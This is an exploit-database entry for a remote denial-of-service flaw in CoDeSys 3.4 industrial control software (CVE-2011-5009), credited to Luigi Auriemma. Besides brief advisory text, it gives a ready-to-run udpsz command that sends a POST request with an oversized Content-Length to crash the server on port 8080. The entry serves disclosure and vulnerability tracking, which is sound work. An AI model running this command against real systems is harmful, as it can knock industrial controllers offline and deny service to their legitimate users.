CoDeSys 3.4 - POST Null Pointer Content-Length Parsing Remote Denial of Service



EKU-ID: 40934 CVE: CVE-2011-5009;OSVDB-77388 OSVDB-ID:
Author: Luigi Auriemma Published: 2011-11-30 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


source: https://www.securityfocus.com/bid/50854/info

CoDeSys is prone to multiple denial-of-service vulnerabilities.

An attacker can exploit these issues to crash the application and deny service to legitimate users.

udpsz -T -c "POST / HTTP/1.0\r\nContent-Length: 4294967295\r\n\r\n" SERVER 8080 -1